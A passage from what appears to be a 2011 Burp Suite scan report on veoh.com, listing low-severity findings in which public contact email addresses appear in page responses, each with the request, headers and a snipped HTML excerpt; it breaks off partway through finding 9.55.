Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:24 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 26605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:advertising@veoh.com">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.41. http://www.veoh.com/corporate/copyright  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/copyright

Issue detail

The following email addresses were disclosed in the response:

Request

GET /corporate/copyright HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:32 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 29638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<br/>copyright-notice@veoh.com
<br/>
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.42. http://www.veoh.com/corporate/pressroom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/pressroom

Issue detail

The following email addresses were disclosed in the response:

Request

GET /corporate/pressroom HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:25 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 39434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:josh@sternbergcommunications.com">josh@sternbergcommunications.com</a>
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.43. http://www.veoh.com/corporate/privacypolicy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/privacypolicy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /corporate/privacypolicy HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=21
Content-Length: 36356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:privacy@veoh.com">privacy@veoh.com</a>
...[SNIP]...
certain communications from us regarding products and services in which you may be interested. If you do not opt-out at the time you provide information, but choose to opt-out later, send an email to optout@veoh.com or click <a href="mailto:optout@veoh.com">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.44. http://www.veoh.com/corporate/termsofuse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/termsofuse

Issue detail

The following email address was disclosed in the response:

Request

GET /corporate/termsofuse HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:29 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 61158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.45. http://www.veoh.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download

Issue detail

The following email address was disclosed in the response:

Request

GET /download HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=6
Content-Length: 25488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.46. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download/index/permalinkId/v18978294NGnK88j8

Issue detail

The following email address was disclosed in the response:

Request

GET /download/index/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=82
Content-Length: 27106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.47. http://www.veoh.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /faq

Issue detail

The following email address was disclosed in the response:

Request

GET /faq HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 24099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.48. http://www.veoh.com/favorites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favorites

Issue detail

The following email address was disclosed in the response:

Request

GET /favorites HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.49. http://www.veoh.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /help

Issue detail

The following email address was disclosed in the response:

Request

GET /help HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 24102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.50. http://www.veoh.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /login

Issue detail

The following email address was disclosed in the response:

Request

GET /login HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:54 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.51. http://www.veoh.com/messages/inbox  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /messages/inbox

Issue detail

The following email address was disclosed in the response:

Request

GET /messages/inbox HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.52. http://www.veoh.com/metrics/logadevent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /metrics/logadevent

Issue detail

The following email address was disclosed in the response:

Request

GET /metrics/logadevent HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=59
Content-Length: 28568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.53. http://www.veoh.com/myinterests  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myinterests

Issue detail

The following email address was disclosed in the response:

Request

GET /myinterests HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.54. http://www.veoh.com/myplaylists  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myplaylists

Issue detail

The following email address was disclosed in the response:

Request

GET /myplaylists HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 25387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.55. http://www.veoh.com/myprofile/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myprofile/videos

Issue detail

The following email address was disclosed in the response:

Request

GET /myprofile/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
